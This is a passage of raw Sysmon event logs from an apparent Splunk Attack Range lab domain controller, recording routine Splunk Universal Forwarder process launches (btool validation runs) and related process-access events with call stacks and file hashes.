Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-64F0-6064-EE00-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64F0-6064-ED00-00000000AE01}6776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000008314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-ED00-00000000AE01}6776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-ED00-00000000AE01}6776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.330{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64F0-6064-ED00-00000000AE01}6776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.339{266CAFBE-64F0-6064-ED00-00000000AE01}6776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.284{266CAFBE-64F0-6064-EC00-00000000AE01}67886784C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-EC00-00000000AE01}6788C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-EC00-00000000AE01}6788C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.034{266CAFBE-64F0-6064-EB00-00000000AE01}65166508C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64F0-6064-EC00-00000000AE01}6788C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.037{266CAFBE-64F0-6064-EC00-00000000AE01}6788C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64F0-6064-EB00-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000008297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-EB00-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-EB00-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64F0-6064-EB00-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.030{266CAFBE-64F0-6064-EB00-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F900-00000000AE01}5452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 